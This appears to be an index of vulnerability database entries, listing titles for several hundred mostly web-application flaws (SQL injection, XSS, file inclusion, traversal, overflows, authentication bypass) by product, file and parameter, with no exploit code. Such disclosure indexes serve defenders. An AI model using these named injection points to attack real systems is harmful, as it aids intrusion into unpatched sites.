[52275] Multi Languages WebShop Online detail.php id Parameter SQL Injection
[52261] ASPThai.Net Webboard bview.asp id Parameter SQL Injection
[52189] IBM WebSphere Message Broker Event / System Log Local Database Password Disclosure
[52187] DVR4-SecuraNet HTTP Interface Default Admin Credentials
[52151] mlmmj contrib/web/perl-user Unspecified Injection
[52018] Trend Micro InterScan Web Security Multiple Products Proxy-Authorization Header Remote Information Disclosure
[51993] WebBiscuits Modules Controller adminhead.php path[docroot] Parameter Remote File Inclusion
[51924] phpWebSite links.php cid Parameter SQL Injection
[51922] FAST ESP Management Interface Unspecified XSS
[51906] Agavi AgaviWebRouting::gen(null) Method XSS
[51899] Den Dating Website Script searchmatch.php txtlookgender Parameter SQL Injection
[51881] Trend Micro InterScan Web Security Suite Multiple JSP Pages Admin Authentication Bypass
[51872] WebFrame base/menu.php classFiles Parameter Remote File Inclusion
[51871] WebFrame index.php classFiles Parameter Remote File Inclusion
[51870] WebFrame admin/doc/index.php classFiles Parameter Remote File Inclusion
[51869] WebFrame mod/index.php Multiple Parameter Traversal Local File Inclusion
[51867] Blue Coat K9 Web Protection functions.js Manipulation Privilege Escalation
[51865] SmartMax MailMax/Web Cookie Application Path Disclosure
[51855] FotoWeb Grid.fwx search Parameter XSS
[51854] FotoWeb Login.fwx s Parameter XSS
[51833] BlackBerry Application Web Loader ActiveX (AxLoader) Overflow
[51831] WEBalbum photo.php id Parameter SQL Injection
[51830] HP JetDirect HP-ChaiSOE Web Server Unspecified Administration Component Traversal Arbitrary File Access
[51777] Meet#Web RegRightsResource.class.php root_path Parameter Remote File Inclusion
[51776] Meet#Web RegResource.class.php root_path Parameter Remote File Inclusion
[51775] Meet#Web RegForm.class.php root_path Parameter Remote File Inclusion
[51774] Meet#Web ManagerRightsResource.class.php root_path Parameter Remote File Inclusion
[51773] Meet#Web ManagerResource.class.php root_path Parameter Remote File Inclusion
[51772] Meet#Web modules.php root_path Parameter Remote File Inclusion
[51743] NaviCOPA Web Server Crafted HTTP Request Handling PHP Source Code Disclosure
[51742] NaviCOPA Web Server GET Request Handling Overflow
[51732] Google Chrome Current Session Cleartext Web Sites Credential Disclosure
[51722] BRS WebWeaver FTP Aborted RETR Command Remote DoS
[51663] IBM WebSphere Application Server (WAS) Admin Console /ibm/console/outputRedirectDetail.do Multiple Parameter Arbitrary File Access
[51660] Profense Web Application Firewall ajax.html Multiple CSRF
[51659] Profense Web Application Firewall proxy.html proxy Parameter XSS
[51627] SAP NetWeaver / Web DynPro Unspecified XSS
[51624] Web-Calendar Lite main.asp Multiple Parameter SQL Injection
[51618] Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS
[51617] Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection
[51611] WebSVN listing.php repname Parameter Remote File Access
[51604] Sun Java System Application Server Multiple Directory Web Application Configuration File Remote Access
[51601] PHP JOBWEBSITE PRO siteadmin/forgot.php Multiple Parameter XSS
[51600] PHP JOBWEBSITE PRO siteadmin/forgot.php adname Parameter SQL Injection
[51573] Polycom ViaVideo Web Server HTTP GET Request Remote Overflow
[51572] Polycom ViaVideo Web Server Incomplete HTTP Connection Saturation Remote DoS
[51571] Web Help Desk Helpdesk.woa Encoded JavaScript XSS
[51568] IBM Domino Web Access Upload Module (inotes6*.dll) SEH Overwrite
[51550] Discussion Web _private/discussion.mdb Direct Request Password Disclosure
[51541] WebSVN utils.inc create_anchors Function Arbitrary PHP Code Execution
[51505] RoundCube Webmail HTML Background Attribute XSS
[51498] WebAmoeba Ticket System Component for Joomla! index.php catid Parameter SQL Injection
[51492] OLIB7 WebView cgi/ URI infile Parameter Information Disclosure
[51464] Velocity Security Management System Web Server Traversal Arbitrary File Access
[51398] Cisco IronPort Products Admin Interface CSRF Arbitrary Command Execution
[51397] Cisco IronPort Products Admin Interface CSRF User Preference Manipulation
[51366] Oracle BEA WebLogic Server /reviewService/createArtist_session.jsp XSS
[51365] Oracle BEA WebLogic Server /reviewService/InterceptorClientServlet XSS
[51363] Oracle BEA WebLogic Server /reviewService/examplesWebApp/JWS_WebService.jsp XSS
[51362] Oracle BEA WebLogic Server /reviewService/addReview_service.jsp rating Parameter XSS
[51361] Oracle BEA WebLogic Server reviewService/addBooks_session_ejb21.jsp title Parameter XSS
[51360] Oracle BEA WebLogic Server /reviewService/createArtist_service.jsp Multiple Parameter XSS
[51316] Oracle BEA WebLogic Portal Administration Console Unspecified XSS
[51314] Oracle BEA WebLogic Server / Express Console Unspecified Privilege Escalation
[51313] Oracle BEA WebLogic Server / Express JSP Servlets Unspecified Information Disclosure
[51312] Oracle BEA WebLogic Server / Express Web Services Unspecified Policy Bypass
[51311] Oracle BEA WebLogic Plug-in For Multiple Web Servers HTTP Request Remote Overflow DoS
[51266] StanWeb.CMS default.asp id Parameter SQL Injection
[51238] Horde Webmail addevent.php url Parameter XSS
[51181] Webutil webutil.pl Arbitrary Command Execution
[51162] SolucionWeb main.php id_area Parameter SQL Injection
[51081] Pixel8 Web Photo Album Photo.asp AlbumID Parameter SQL Injection
[51077] AlstraSoft Web Email Script Enterprise index.php id Parameter SQL Injection
[51076] Site2Nite Real Estate Web agentlist.asp SQL Injection
[51015] webClassifieds index.php Multiple Parameter SQL Injection
[50985] F5 BIG-IP Web Management Console tmui/Control/form CSRF
[50971] Sun Java Web Console console/faces/jsp/login/BeginLogin.jsp redirect_url Parameter Arbitrary Site Redirect
[50954] Opera HTML Parsing Engine Crafted Web Page Arbitrary Code Execution
[50940] Iltaweb Alisveris Sistemi urunler.asp catno Parameter SQL Injection
[50918] GIT gitweb/gitweb.perl diff.external Configuration Variable Crafted Query Local Privilege Escalation
[50915] Extract Website download.php filename Parameter Traversal Arbitrary File Access
[50896] WEBERkommunal Facilities Extension for TYPO3 Unspecified SQL Injection
[50884] WebcamXP Unspecified URL-encoded Traversal Arbitrary File Access
[50879] RoundCube Webmail Crafted Quota Image Size Parameter Memory Consumption DoS
[50871] Phpclanwebsite index.php page Parameter XSS
[50870] Phpclanwebsite pcw/downloads.php Multiple Parameter SQL Injection
[50869] Phpclanwebsite pcw/setlogin.php pcwlogin Parameter SQL Injection
[50868] Phpclanwebsite pcw/processforms.php form_id Parameter SQL Injection
[50867] Phpclanwebsite index.php page Parameter SQL Injection
[50866] Phpclanwebsite phpclanwebsite/footer.php theme Parameter Traversal Local File Inclusion
[50865] Phpclanwebsite theme/superchrome/box.php boxname Parameter Traversal Local File Inclusion
[50864] Fujitsu-Siemens WebTransactions Temporary Session Crafted HTTP Request Arbitrary Command Execution
[50790] Kerio MailServer WebMail error413.php sent Parameter XSS
[50789] Kerio MailServer WebMail calendarEdit.php daytime Parameter XSS
[50788] Kerio MailServer WebMail mailCompose.php folder Parameter XSS
[50771] Dr.Web Anti-virus HTML Document MZ Header Multiple Filename Modification Malware Detection Bypass
[50757] Secure Computing Secure Web Gateway HTML Document MZ Header Multiple Filename Modification Malware Detection Bypass
[50745] Microsoft Office Web Controls OWC11.DataSourceControl Memory Access Violation
[50742] CMS ISWEB index.php Multiple Parameter XSS
[50741] CMS ISWEB index.php Multiple Parameter SQL Injection
[50720] IBM WebSphere Portal BasicAuthTAI Function Unspecified Access Restriction Bypass
[50706] Promise NAS NS4300N Web GUI usercp.php user Parameter Arbitrary Account Password Manipulation
[50694] RoundCube Webmail bin/html2text.php preg_replace Function Remote PHP Code Execution
[50655] Webmaster Marketplace member.php u Parameter SQL Injection
[50643] IBM Rational ClearQuest CQ Web Unspecified XSS
[50640] IBM Rational ClearQuest MultiSite Web Crafted jtl.properties File Client Submission Redirection
[50631] Cisco Linksys WVC54GC NetCamPlayerWeb11gv2 ActiveX (NetCamPlayerWeb11gv2.ocx) SetSource Method Arbitrary Code Execution
[50613] Microsoft IE WebDAV Cached Content Request Parsing Overflow
[50602] WebCAF index.php Multiple Parameter Traversal Local File Inclusion
[50601] WebCAF modules/view.php view Parameter Traversal Local File Inclusion
[50571] PhPepperShop Webshop shop/Admin/SHOP_KONFIGURATION.php URL XSS
[50570] PhPepperShop Webshop shop/Admin/shop_kunden_mgmt.php URL XSS
[50569] PhPepperShop Webshop shop/kontakt.php URL XSS
[50568] PhPepperShop Webshop index.php URL XSS
[50514] Sun Java JDK / JRE Java Web Start BasicService Arbitrary File Access
[50512] Sun Java JDK / JRE Java Web Start / Plug-in HTTP Session Hijacking
[50511] Sun Java JDK / JRE Java Web Start SingleInstanceImpl Class SI_FILEDIR Property Application Information Enumeration
[50510] Sun Java JDK / JRE Java Web Start (JWS) JNLP File System Properties Override File Inclusion
[50509] Sun Java JDK / JRE Java Web Start Application file: Protocol Arbitrary File Access
[50497] Sun Java JDK / JRE Java Web Start Application JNLP File Handling Socket Restriction Bypass
[50479] WebGUI Web View Mail Attachments Program Execution
[50471] Abyss Web Server GET Request Remote Overflow
[50468] Bandwebsite info.php section Parameter XSS
[50467] Bandwebsite lyrics.php id Parameter SQL Injection
[50466] WebStudio CMS index.php pageid Parameter SQL Injection
[50445] Webboard Street connect.inc Direct Request Database Disclosure
[50444] Webboard Street show.php id Parameter SQL Injection
[50425] WebWasher ARJ Decoder Malformed Archive Handling DoS
[50423] Webhosting Component for Mambo / Joomla! index.php catid Parameter SQL Injection
[50415] Active Web Mail login.aspx password Parameter SQL Injection
[50400] Active Web Helpdesk default.aspx CategoryID Parameter SQL Injection
[50382] eWebquiz start.asp Multiple Parameter SQL Injection
[50296] Blender BPY_interface sys.path Search Path Subversion Local Privilege Escalation
[50288] Apple iPhone Configuration Web Utility for Windows Traversal Arbitrary File Access
[50201] WebStudio eHotel index.php pageid Parameter SQL Injection
[50200] WebStudio eCatalogue index.php pageid Parameter SQL Injection
[50125] IBM Tivoli Access Manager WebSEAL webseald Daemon Crafted HTTP Message Handling Remote DoS
[50111] Trend Micro ServerProtect RPC Interface Unspecified Administrative Access
[50106] Xe webtv Component for Joomla! index.php id Parameter SQL Injection
[50022] MiniWebsvr GET Request Traversal Arbitrary File Access
[50018] IBM Workplace Web Content Management Unspecified XSS
[49999] Pi3Web ISAPI Directory File Request Error Message Path Disclosure
[49998] Pi3Web ISAPI Directory File Request Remote DoS
[49875] PromoteWeb MySQL go.php id Parameter SQL Injection
[49848] AlstraSoft Web Host Directory Login Script pwd Parameter SQL Injection
[49839] TurnkeyForms Web Hosting Directory admin/backup/db Direct Request Database Disclosure
[49838] TurnkeyForms Web Hosting Directory adm Cookie Manipulation Admin Authentication Bypass
[49824] WEBBDOMAIN Post Card admin/admin.php username Parameter SQL Injection
[49823] WEBBDOMAIN Post Card choosecard.php catid Parameter SQL Injection
[49818] buymyscripts.net Recipe Website Script search.php keyword XSS
[49802] com_weblinks Component for Joomla! Weblink Submission Multiple Parameter XSS
[49784] IBM WebSphere Application Server (WAS) Web Services Certificate Store Collections Certificate Revocation Lists Bypass
[49782] IBM WebSphere Application Server (WAS) HTTP Transport HTTP_Request_Parser Method Long Host Header Remote DoS
[49761] WEBBDOMAIN Quiz Admin Login Functionality getin.php username Parameter SQL Injection
[49760] WEBBDOMAIN Polls Admin Login Functionality getin.php username Parameter SQL Injection
[49759] WEBBDOMAIN Petition Admin Login Functionality getin.php username Parameter SQL Injection
[49720] WEBBDOMAIN WebShop Admin Section getin.php Username Parameter SQL Injection
[49719] WEBBDOMAIN WebShop detail.php name Parameter XSS
[49718] WEBBDOMAIN WebShop detail.php id Parameter SQL Injection
[49680] Mini Web Calendar php/cal_pdf.php thefile Parameter Traversal Arbitrary File Access
[49679] Mini Web Calendar php/cal_default.php URL Parameter XSS
[49640] wims coqweb Multiple Temporary File Symlink Arbitrary File Overwrite
[49637] hMailServer PHPWebAdmin initialize.php hmail_config[includepath] Parameter Remote File Inclusion
[49636] hMailServer PHPWebAdmin index.php page Parameter Traversal Local File Inclusion
[49568] Sun Java Web Start BasicService showDocument Method file:// URL Handling Arbitrary Program Execution
[49542] U-Mail Webmail edit.php Multiple Variable Arbitrary Remote File Overwrite
[49512] SFS EZ Webring category.php cat Parameter SQL Injection
[49480] InstallShield Update Service Agent isusweb.dll ActiveX ExecuteRemote Call 404 Response DoS
[49468] CA ARCserve Backup RPC Interface (asdbapi.dll) Traversal Arbitrary Command Execution
[49465] A-LINK WL54AP3 / WL54AP2 Management Interface Domain Name XSS
[49422] WebCards admin.php Image Macro File Upload Arbitrary PHP Code Execution
[49421] WebCards admin.php user Parameter SQL Injection
[49420] WebGUI lib/WebGUI/Asset.pm loadModule() Function Arbitrary Remote Code Execution
[49383] Avaya SIP Enablement Services (SES) Server Remote Management Interface Core Router Update Request Remote DoS
[49362] AutomatedShops WebC Shopping Cart webc.emf Handling Format String
[49361] AutomatedShops WebC Shopping Cart webc.cgi Symlink Local Privilege Escalation
[49360] AutomatedShops WebC Shopping Cart Environment Variable Handling Local Overflow
[49359] AutomatedShops WebC Shopping Cart webc.cgi Script Name Handling Remote Overflow
[49288] Oracle BEA WebLogic Server Servlets Unspecified Authenticated Remote Issue
[49287] Oracle BEA WebLogic Workshop NetUI Pageflows Unspecified Remote Issue
[49286] Oracle BEA WebLogic Server WLS Console Unspecified Remote Issue
[49285] Oracle BEA WebLogic Workshop NetUI Tags Unspecified Remote Issue
[49284] Oracle BEA WebLogic Server Servlets Unspecified Unauthenticated Remote Issue
[49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
[49263] PhpWebGallery isadmin.inc.php user[language] Parameter Traversal Local File Inclusion
[49262] PhpWebGallery init.inc.php Multiple Parameter Traversal Local File Inclusion
[49245] WebSVN rss.php rev Variable Traversal Arbitrary File Overwrite
[49244] WebSVN index.php URL Parameter XSS
[49240] Ultimate Webboard webboard.php Category Parameter SQL Injection
[49230] Microsoft Outlook Web Access (OWA) exchweb/bin/redir.asp URL Variable Arbitrary Site Redirect
[49185] PhpWebGallery admin/include/isadmin.inc.php Multiple Parameter XSS
[49162] PhpWebGallery plugins/event_tracer/event_list.php create_function Function Arbitrary PHP Code Execution
[49161] PhpWebGallery comments.php sort_by Parameter SQL Injection
[49158] WEB//NEWS parse/module_search.php catid Parameter SQL Injection
[49155] WebGUI Arbitrary Password Reset
[49154] WebGUI Unspecified XSS
[49151] Sports Clubs Web Panel index.php p Parameter Traversal Local File Inclusion
[49149] Hummingbird Xweb Hummingbird.XWebHostCtrl.1 ActiveX (hclxweb.dll) PlainTextPassword Property Overflow
[49139] Webscene eCommerce productlist.php level Parameter SQL Injection
[49104] IBM Rational ClearQuest CQWeb Login Page id Field Manipulation Information Disclosure
[49070] Websense Reporter Module CreateDbInstall.log Local Admin Password Disclosure
[49065] Sun Java System Web Proxy Server FTP Subsystem Unspecified Remote Overflow
[49034] Blue Coat K9 Web Protection Client-side Javascript Authentication Bypass
[48988] Apple Mac OS X Server Weblog Posting ACL Weakness
[48954] PHP Web Explorer edit.php file Parameter Traversal Local File Inclusion
[48953] PHP Web Explorer main.php refer Parameter Traversal Local File Inclusion
[48915] WebBiscuits Modules Controller wce.download.php download Parameter Traversal Arbitrary File Access
[48858] H-Sphere WebShell actions.php Multiple Parameter CSRF
[48857] H-Sphere WebShell actions.php Multiple Parameter XSS
[48809] Website Directory index.php keyword Parameter XSS
[48805] JMweb MP3 Music Audio Search and Download Script download.php src Parameter Traversal Local File Inclusion
[48804] JMweb MP3 Music Audio Search and Download Script listen.php src Parameter Traversal Local File Inclusion
[48796] V-webmail redirect.php to Variable Arbitrary Site Redirect
[48795] V-webmail login.php username Field SQL Injection
[48794] V-webmail Malformed Session Data Temporary Directory Disclosure
[48793] V-webmail Login Page imap_open() Function Path Disclosure
[48783] Mozilla Firefox keypress User Interface Event Dispatcher DoS
[48731] WebBiscuits Multiple Products common/theme/default/header_setup.php Multiple Parameter Remote File Inclusion
[48727] Adult Banner Exchange Website click.php targetid Parameter SQL Injection
[48664] ParsaWeb CMS default.aspx Multiple Parameter SQL Injection
[48624] Addalink Approved Field Remote Site Web-site Addition Approval
[48610] IBM Tivoli Netcool Webtop Browser Cached Privileges Weakness
[48598] Diebold Global Election Management System (GEMS) Graphic Interface Widget Based Protection Bypass
[48518] JETIK-WEB sayfa.php kat Parameter SQL Injection
[48516] web-cp sendfile.php filelocation Parameter Arbitrary File Access
[48472] Apple iPod Touch WebKit CSS Import Statement Handling Arbitrary Code Execution
[48453] x10 Automatic MP3 Search Engine Script includes/function_core.php webroot Parameter Remote File Inclusion
[48452] x10 Automatic MP3 Search Engine Script templates/layout_lyrics.php webroot Parameter Remote File Inclusion
[48426] Peachtree Accounting ActiveX (PAWWeb11.ocx) ExecutePreferredApplication() Method Arbitrary Program Execution
[48419] Unreal Tournament 3 WebAdmin ImageServer Unspecified Traversal Arbitrary File Access
[48318] Mercurial hgweb allowpull Permission Enforcement Weakness
[48282] HyperStop Web Host Directory admin/backup/db Direct Request Database Disclosure
[48262] Google Chrome WebKit Arbitrary JAR Execution (Google Mule)
[48240] Apple Safari on iPhone / iPod WebKit _web_drawInRect:withFont:ellipsis:alignment:measureOnly Function Crafted JavaScript Alert Call DoS
[48232] H-Sphere webshell4 login.php Multiple Parameter XSS
[48223] Kantan WEB Server Unspecified Traversal Arbitrary File Access
[48222] Kantan WEB Server Unspecified XSS
[48200] WebPortal CMS download.php aid Parameter SQL Injection
[48175] Red Hat Directory Server Directory Server Gateway (DSGW) Interface adminutil Library Unspecified XSS
[48174] Red Hat Directory Server Directory Server Administration Express Interface adminutil Library Unspecified XSS
[48152] Sun Management Center (SMC) PRM Web Page Unspecified DoS
[48143] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Unspecified Issue (PK64302)
[48011] WebCMS index.php Multiple Parameter SQL Injection
[48010] WebCMS index.php patron Parameter XSS
[47915] aspWebAlbum album.asp message Parameter XSS
[47914] aspWebAlbum album.asp txtUserName Parameter SQL Injection
[47913] aspWebAlbum Unrestricted File Upload Arbitrary ASP Code Execution
[47864] Web Directory Script index.php site Parameter SQL Injection
[47855] Mono Sys.Web Module HTTP Header Injection
[47818] Web Directory Script listing_view.php name Parameter SQL Injection
[47817] Fujitsu Web-Based Admin View URI Traversal Arbitrary File Access
[47803] webEdition CMS Unspecified Script we_objectID Parameter SQL Injection
[47791] Civic Website Manager Calendar Control Unspecified XSS
[47759] CRM-CTT Interleave Crafted Filename WebDAV Database Query DoS
[47752] Trend Micro Multiple Products Web Management Predictable Token Authentication Bypass
[47700] Oracle WebLogic Server Unspecified Remote Information Disclosure
[47699] Oracle WebLogic Server Unspecified Local Issue
[47698] Oracle WebLogic Server Unspecified Complex Local Issue
[47697] Oracle WebLogic Server Console / WLST Unspecified Remote Issue
[47696] Oracle BEA WebLogic Server Unspecified Remote DoS
[47695] Oracle WebLogic Server UDDI Explorer Unspecified Remote Issue
[47694] Oracle WebLogic Server Plugins Unspecified Remote Issue
[47631] IBM WebSphere Portal Server Unspecified Authentication Bypass
[47595] TimeTrex interface/Login.php Multiple Parameter XSS
[47592] Anzio Web Print Object (WePO) ActiveX mainurl Variable Overflow
[47586] Alcatel-Lucent OmniSwitch Agranet-Emweb Management Server Session Cookie Handling Remote Overflow
[47471] WEBrick in Ruby WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS
[47425] Sun Java System Web Proxy Server FTP Subsystem Unspecified Remote DoS
[47383] PHP-Ring Webring System admin/wr_admin.php Crafted Admin Cookie Remote Authentication Bypass
[47357] IBM WebSphere Portal Unspecified Remote Authentication Bypass
[47344] Cisco Webex Meeting Manager WebexUCFObject ActiveX (atucfobj.dll) NewObject() Method Overflow
[47290] Apple Safari WebCore STYLE Element CSSStyleSheet Object ownerNode Property Heap Corruption
[47288] Apple iPhone / iPod touch WebKit JavaScriptCore Garbage Collection Unspecified Memory Corruption
[47276] Apple Xcode tools WebObjects WOHyperlink Implementation Non-local URL Session Information Disclosure
[47272] @Mail webmail/webadmin/.htpasswd Permission Weakness Local Information Disclosure
[47271] @Mail webmail/libs/Atmail/Config.php Permission Weakness Local Information Disclosure
[47267] IBM WebSphere Application Server (WAS) Security Component PropFilePasswordEncoder Utility Unspecified Issue
[47266] IBM WebSphere Application Server (WAS) System Management/Repository Component Wsadmin Unspecified Issue
[47265] Blue Coat K9 Web Protection Filter Service (k9filter.exe) Referer Header Handling Buffer Overflow
[47264] Blue Coat K9 Web Protection Filter Service (k9filter.exe) HTTP Version Response Handling Remote Overflows
[47256] Sun N1 Service Provisioning System (SPS) Sun Java System Web Server Plugin Unspecified Privilege Escalation
[47221] Mobius Web Publishing Software detail.php s Parameter SQL Injection
[47220] Mobius Web Publishing Software browse.php id Parameter SQL Injection
[47213] Trend Micro OfficeScan Web-Deployment ObjRemoveCtrl ActiveX (OfficeScanRemoveCtrl.dll) Multiple Property Overflows
[47211] Web Wiz Forum log_off_user.asp CSRF
[47210] Web Wiz Forum admin_category_details.asp mode Parameter XSS
[47209] Web Wiz Forum admin_group_details.asp mode Parameter XSS
[47208] PhpWebGallery Profile Page E-Mail Address Information Disclosure
[47190] Web Wiz Rich Text Editor RTE_popup_link.asp email Parameter XSS
[47164] EZWebAlbum download.php dlfilename Parameter Traversal Arbitrary File Access
[47163] EZWebAlbum constants.inc photoalbumadmin Cookie Administrator Authentication Bypass
[47096] Oracle Weblogic Apache Connector POST Request Overflow
[47069] LunarNight Laboratory WebProxy Unspecified XSS
[47062] Citrix XenServer XenAPI HTTP Interface Unspecified XSS
[47058] Comdev Web Blogger Blog Page arcmonth Parameter SQL Injection
[47049] WebBlizzard CMS index.php page Parameter SQL Injection
[47036] Galatolo WebManager (GWM) plugins/users/index.php id Parameter SQL Injection
[47035] Galatolo WebManager (GWM) all.php tag Parameter XSS
[47034] Maian Weblog admin/index.php weblog_cookie Cookie Admin Authentication Bypass
[47020] webCMS Portal Edition secciones/tablon/tablon.php id Parameter SQL Injection
[46993] TIBCO Rendezvous (RV) Admin Interface index.html Direct Request Information Disclosure
[46988] Sun Java System Web Server Redirect Feature CRLF Injection
[46959] Sun Java JDK / JRE Java Web Start Untrusted Application Multiple Overflows
[46958] Sun Java JDK / JRE Java Web Start CacheEntry Class writeManifest() Method Arbitrary File Creation
[46957] Sun Java JDK / JRE Java Web Start Untrusted Application Arbitrary File Manipulation
[46956] Sun Java JDK / JRE Java Web Start Untrusted Application Cache Location Disclosure
[46909] phpDatingClub website.php page Parameter Traversal Local File Inclusion
[46879] VanGogh Web CMS index.php article_ID Parameter SQL Injection
[46817] XEROX CentreWare Web (CWW) Multiple Unspecified XSS
[46816] XEROX CentreWare Web (CWW) Multiple Unspecified SQL Injection
[46807] webXell Editor upload_pictures.php Unrestricted File Upload Arbitrary Code Execution
[46798] Webdevindo-CMS index.php hal Parameter SQL Injection
[46780] Microsoft Outlook Web Access (OWA) HTML Parsing Unspecified XSS
[46779] Microsoft Outlook Web Access (OWA) Data Validation Unspecified XSS
[46775] Brightcode Weblinks component for Joomla! index.php catid Parameter SQL Injection
[46748] Academic Web Tools PHPSESSID Session Fixation
[46747] Academic Web Tools room.php Message XSS
[46746] Academic Web Tools rss_getfile.php file Parameter XSS
[46745] Academic Web Tools /hta/htmlarea.js.php
[46744] Academic Web Tools login.php URL XSS
[46743] Academic Web Tools rating.php book_id Parameter SQL Injection
[46742] Academic Web Tools download.php dfile Variable Traversal Arbitrary File Access
[46709] Direct Web Remoting (DWR) Multiple Unspecified XSS
[46644] Flux CMS webinc/bxe/scripts/loadsave.php Request Body PHP File Overwrite Arbitrary Code Execution
[46642] aspWebCalendar calendar_admin.asp Unrestricted File Upload Arbitrary Code Execution
[46595] Avaya Message Storage Server (MSS) Admin Interface S/FTP Storage Configuration Arbitrary Command Execution
[46594] Avaya Message Storage Server (MSS) Admin Interface Name Server Lookup Arbitrary Command Execution
[46593] Avaya Message Storage Server (MSS) Admin Interface Ping Utility Arbitrary Command Execution
[46592] Avaya Message Storage Server (MSS) Admin Interface TCP/IP Network Configuration Arbitrary Command Execution
[46591] Avaya Message Storage Server (MSS) Admin Interface External Host Modification Arbitrary Command Execution
[46590] Avaya Message Storage Server (MSS) Admin Interface Windows Domain Parameter Arbitrary Command Execution
[46589] Avaya Message Storage Server (MSS) Admin Interface Time Settings Arbitrary Command Execution
[46588] Avaya Message Storage Server (MSS) Admin Interface Alarm Settings Arbitrary Command Execution
[46587] Avaya Message Storage Server (MSS) Admin Interface Command Line History Form Arbitrary Command Execution
[46586] Avaya Message Storage Server (MSS) Admin Interface Maintenance Form Arbitrary Command Execution
[46585] Avaya Message Storage Server (MSS) Admin Interface Server Event Configuration Arbitrary Command Execution
[46528] Drinks Website drink.php drinkid Parameter SQL Injection
[46527] Riddles Website riddle.php riddleid Parameter SQL Injection
[46526] Tips Website tip.php tipid Parameter SQL Injection
[46520] Cheats Complete Website item.php itemid Parameter SQL Injection
[46519] Jokes Website joke.php jokeid Parameter SQL Injection
[46510] WebGUI Collaboration System RSS Feed Authentication Bypass Information Disclosure
[46502] Apple Safari WebKit JavaScript Array Handling Memory Corruption Arbitrary Code Execution
[46500] WebCalendar send_reminders.php Multiple Parameter Remote File Inclusion
[46494] NiTrO Web Gallery albums.php CatId Parameter SQL Injection
[46443] Galatolo WebManager (GWM) view.php id Parameter SQL Injection
[46442] Galatolo WebManager (GWM) index.php com Parameter Traversal Local File Inclusion
[46441] Galatolo WebManager (GWM) admin/plugins.php plugin Parameter Traversal Local File Inclusion
[46440] WEBalbum photo_add-c.php Multiple Parameter XSS
[46433] Easy Webstore index.php cat_path Parameter SQL Injection
[46230] BitKinex WebDAV Client PROPFIND Command Traversal Arbitrary File Manipulation
[46213] BitTorrent Web UI Malformed HTTP Range Header DoS
[46212] uTorrent Web UI Malformed HTTP Range Header DoS
[46208] Kronos webTA com.threeis.webta.H720editProjectInfo Description Field XSS
[46207] Kronos webTA com.threeis.webta.H710selProject Description Field XSS
[46186] Advanced Webhost Billing System (AWBS) news.php viewnews Parameter SQL Injection
[46163] WebChamado admin/index.php eml Parameter SQL Injection
[46162] WebChamado index.php eml Parameter SQL Injection
[46161] WebChamado lista_anexos.php tsk_id Parameter SQL Injection
[46153] SHOUTcast Admin Panel Login Interface username Parameter XSS
[46144] PHP JOBWEBSITE PRO jobseekers/JobSearch3.php Multiple Parameter SQL Injection
[46137] XEROX WorkCentre Web Server Unspecified XSS
[46136] XEROX Copier / Printer Multiple Products Web Server Unspecified XSS
[46087] Logitech Desktop Messenger BackWeb ActiveX Unspecified Overflow
[46076] BackWeb Lite Install Runner LiteInstActivator.dll ActiveX (LiteInstActivator.dll) Overflow
[46048] Real-Estate-Website location.asp name Parameter XSS
[46047] Real-Estate-Website location.asp location Parameter SQL Injection
[46003] F5 FirePass /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS
[45961] IBM WebSphere Application Server (WAS) SOAP Security Header Unspecified Exposure
[45938] Weblosning result.php search Parameter XSS
[45937] Weblosning index2.php Multiple Parameter SQL Injection
[45932] SMEweb order.php new_s Parameter XSS
[45931] SMEweb bb.php page Parameter XSS
[45930] SMEweb search.php keyword Parameter XSS
[45929] SMEweb catalog.php data Parameter XSS
[45928] SMEweb catalog.php Multiple Parameter SQL Injection
[45923] MDaemon WorldClient Interface Message Handling Multiple Field Overflow
[45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
[45864] Social Site Generator webadmin/download_file.php file Parameter Arbitrary File Access
[45863] Social Site Generator webadmin/download.php file Parameter Arbitrary File Access
[45854] Alt-N SecurityGateway.dll Administration Interface username Field Remote Overflow
[45839] BEA WebLogic Server Admin Server Security Policy Propagation Weakness
[45838] BEA WebLogic Server SSL MitM Plaintext Information Disclosure
[45830] PHP Foreign Function Interface (ffi) Extension Arbitrary DLL Loading safe_mode Restriction Bypass
[45814] Microsoft IE Arbitrary Website Zone Addition Domain Suppression DoS
[45786] vtiger CRM SOAP Webservice Inactive Account Access Bypass
[45776] Web Slider index.php slide Parameter SQL Injection
[45749] XEROX DocuShare docushare/dsweb/ServicesLib/Group XSS
[45748] XEROX DocuShare dsdn/dsweb/Services/User XSS
[45747] XEROX DocuShare dsdn/dsweb/SearchResults XSS
[45729] KENT-WEB Web Mart Unspecified XSS
[45718] eMule X-Ray Web Server Unspecified Memory Corruption
[45705] Apple Mac OS X Image Capture Embedded Web Server Traversal Arbitrary File Access
[45688] Cisco Service Control Engine (SCE) SSH Server Management Interface Traffic Remote DoS
[45649] SAP Web Application Server sap/bc/gui/sap/its/webgui/ URL XSS
[45627] XEROX WorkCentre Web Server Unspecified XSS
[45625] Sun Java System Web Server Advanced Search Mechanism Unspecified XSS
[45596] eZ publish Administrator Interface Information Disclosure
[45577] Kerio Webstar WSWebServer Dynamic Library Linking Local Privilege Escalation
[45576] Kerio Webstar WSAdminServer Dynamic Library Linking Local Privilege Escalation
[45534] SonicWALL SSL-VPN WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion
[45508] Web Slider Admin.php admin Cookie Modification Authentication Bypass
[45490] 3Com 3CRWER100-75 Router Persistent Web Page Product Information Disclosure
[45460] Archangel Weblog index.php post_id Parameter SQL Injection
[45415] IBM Lotus Domino Web Server Accept-Language HTTP Header Remote Overflow
[45414] IBM Lotus Domino Web Server Servlet engine/Web Container Unspecified XSS
[45410] web-app.org WebAPP cgi-bin/cgi-lib/instantmessage.pl moveim Function Instant Message Moving Unspecified Issue
[45409] web-app.org WebAPP cgi-bin/cgi-lib/instantmessage.pl Instant Message From Field Unspecified Issue
[45408] web-app.org WebAPP cgi-bin/cgi-lib/subs.pl getcgi Function String Handling Unspecified Issue
[45402] web-app.org WebAPP Multiple Script memberlist.dat Verification Failure
[45401] web-app.org WebAPP cgi-bin/cgi-lib/subs.pl loaduser Function Random Cookie Password Functionality Unspecified Issue
[45400] web-app.org WebAPP cgi-bin/cgi-lib/user.pl editprofile3 Function .dat File Check Unspecified Issue
